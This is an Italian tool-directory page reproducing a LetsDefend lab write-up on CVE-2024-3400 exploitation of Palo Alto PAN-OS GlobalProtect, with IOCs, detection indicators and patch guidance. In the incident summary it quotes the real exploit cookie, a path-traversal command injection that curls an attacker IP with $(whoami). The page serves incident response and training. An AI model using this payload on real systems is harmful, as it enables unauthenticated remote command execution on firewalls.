Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
letsdefend-cve2024-3400-case-study — Strategie di rilevamento, analisi e risposta per tentativi di sfruttamento di CVE-2024-3400 che prendono di mira i portali GlobalProtect di Palo Alto PAN-OS. Include IOCs, pattern di exploit e indicazioni per la mitigazione. | Kitploit
Strumenti/GitHubGitHub/cyprianatsyor/letsdefend-cve2024-3400-case-study
Gestione degli Indicatori di Compromissione (IOC)Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebInformatica ForenseDigital ForensicsCommand and ControlThreat IntelligenceApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Risposta agli Incidenti
Analisi dei Log
GitHubcyprianatsyor/letsdefend-cve2024-3400-case-study

letsdefend-cve2024-3400-case-study

Strategie di rilevamento, analisi e risposta per tentativi di sfruttamento di CVE-2024-3400 che prendono di mira i portali GlobalProtect di Palo Alto PAN-OS. Include IOCs, pattern di exploit e indicazioni per la mitigazione.

Vedi Repository
1 anno faNon ancora revisionato

letsdefend-cve2024-3400-case-study

Strategie di rilevamento, analisi e risposta per tentativi di sfruttamento di CVE-2024-3400 che prendono di mira i portali GlobalProtect di Palo Alto PAN-OS. Include IOC, modelli di exploit e linee guida per la mitigazione.

Indagine sull'incidente CVE-2024-3400

🔍 Panoramica

Questo repository contiene un'indagine dettagliata e un'analisi delle minacce di CVE-2024-3400, una vulnerabilità critica di injection di comandi non autenticata che interessa il software Palo Alto Networks PAN-OS, in particolare il portale GlobalProtect.

Il 18 aprile 2024 è stata rilevata attività di sfruttamento contro un firewall PAN-OS interno utilizzando l'endpoint vulnerabile /global-protect/login.esp. L'attaccante ha utilizzato un cookie SESSID appositamente modificato contenente un comando curl eseguito con backtick per raggiungere un server C2 remoto ospitato su 144.172.79.92 (Miami, Florida). Il payload di sfruttamento ha sfruttato ${IFS} per eludere semplici filtri e ha utilizzato la directory di telemetria di PAN-OS per mettere in scena attività dannose. Il firewall ha risposto con un 200 OK, indicando che il payload è stato probabilmente eseguito con successo.

Panoramica dell'incidente

📄 Riepilogo dell'incidente

  • ID Evento: 249

  • Regola di rilevamento: SOC274 – Sfruttamento di injection di comandi PAN-OS

  • Ora evento: 18 aprile 2024, 03:09 UTC

  • Hostname: PA-Firewall-01

  • IP di destinazione: 172.16.17.139

  • IP di origine: 144.172.79.92

  • Metodo richiesta: POST

  • Endpoint: /global-protect/login.esp

  • Cookie Payload: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)

  • Hash dannosi:

  • SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

  • MD5: 0c1554888ce9ed0da1583dbdf7b31651

  • Script dannoso: (eseguito usando )

🧠 Intelligence sulle minacce

Intelligence sulle minacce

Passo 1: Rilevamento iniziale dell'exploit tramite ricerca su malpedia

Passo 1 dell'indagine

Passo 2: Analisi e indagine dell'hash

Passo 2 dell'indagine

Passo 3: Un'altra indagine

Passo 3 dell'indagine

Passo 4: Indagine sull'indirizzo IP

Passo 4 dell'indagine

🧠 Indicatori comportamentali

  • Abuso di SESSID per injection di comandi
  • Uso di ${IFS} per elusione
  • Staging del payload in /opt/panlogs/tmp/device_telemetry
  • Coinvolgimento del processo dt_send post-sfruttamento
  • Callback di rete all'IP dell'attaccante sulla porta 4444

📄 Prove di registro

Esempio di log


🧩 Correlazione hash

Corrispondenza hash


✅ Punti guadagnati LetsDefend

Punti chiave

🚨 Impatto

  • Esecuzione remota di comandi non autenticata su un appliance di sicurezza core
  • Possibile download ed esecuzione di payload Python controllato dall'attaccante
  • Abuso dei meccanismi di telemetria interna di PAN-OS per staging o esfiltrazione
  • Traffico consentito da un IP dannoso noto

✅ Azioni di risposta consigliate

  1. Aggiornare PAN-OS alle versioni: 10.2.9-h1, 11.0.4-h1 o 11.1.2-h3
  2. Bloccare IP dannoso: 144.172.79.92
  3. Cercare indicatori di compromissione (IOC) nei log e nei file system
  4. Ispezionare le directory di telemetria per file sospetti o comportamento di esecuzione
  5. Isolare i sistemi interessati ed eseguire un'analisi forense completa

📁 Contenuti

  • logs/: Log di rilevamento analizzati e grezzi
  • ioc/: Hash di file e IP associati all'attacco
  • analysis/: Approfondimento sul comportamento dell'exploit e tracciamento dei processi
  • report/: Riepilogo e immagini dei log e dei codici delle mie indagini

Cos'è CVE-2024-3400

CVE-2024-3400 si riferisce a una vulnerabilità critica in Palo Alto Networks PAN-OS, che colpisce specificamente i gateway GlobalProtect. Ecco una sintesi di ciò che è pubblicamente noto al riguardo:

🔥 CVE-2024-3400 – Vulnerabilità di injection di comandi Palo Alto PAN-OS

Punteggio CVSS: 10.0 (Critico)

Pubblicato: Aprile 2024

Prodotti interessati: PAN-OS 10.2, 11.0 e 11.1 con GlobalProtect abilitato.

Sfruttamento: Confermato in natura (zero-day)

Tipo di vulnerabilità: Injection di comandi non autenticata

🧠 Qual è il rischio?

CVE-2024-3400 consente ad attaccanti non autenticati di eseguire comandi arbitrari sul sistema operativo del firewall. Ciò di fatto dà il pieno controllo sui dispositivi interessati senza bisogno di credenziali — un grave punto di violazione per qualsiasi azienda che si affida ai firewall Palo Alto.

⚠️ Condizioni richieste per lo sfruttamento:

Il gateway GlobalProtect deve essere abilitato.

Versioni specifiche di PAN-OS (10.2.x, 11.0.x, 11.1.x).

Sfruttabile via internet se non protetto da ulteriori livelli di sicurezza.

🔎 Cosa stanno facendo gli attaccanti:

Invio di richieste appositamente create per sfruttare il difetto di injection.

Distribuzione di shell remote o download di payload di secondo stadio.

Il comportamento osservato include:

Esecuzione di comandi tramite URL appositamente creati

Meccanismi di persistenza

Movimento laterale all'interno delle reti

🛡️ Mitigazione e raccomandazioni:

Applicare la patch immediatamente: Palo Alto ha rilasciato correzioni; aggiornare a versioni non vulnerabili (ad esempio 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 o successive).

Verificare la presenza di indicatori di compromissione (IOC) come processi sospetti, connessioni in uscita o cronologia CLI insolita.

Utilizzare strumenti come Shodan o inventari delle risorse per trovare appliance vulnerabili.

🛠️ Come investigare (ad esempio tramite LetsDefend o SIEM):

Cercare IP esterni che accedono a GlobalProtect senza autenticazione valida.

Verificare l'esecuzione di comandi sospetti nei log (show system processes, cat /etc/passwd, ecc.).

Monitorare il comportamento del firewall e attivare avvisi per connessioni in uscita anomale.

Questo repository funge sia da rapporto di indagine interno che da risorsa educativa per i difensori che cercano di comprendere lo sfruttamento nel mondo reale delle vulnerabilità PAN-OS. Contributi e osservazioni aggiuntive sono benvenuti.

Scarica lo strumento
update.py
/usr/bin/python3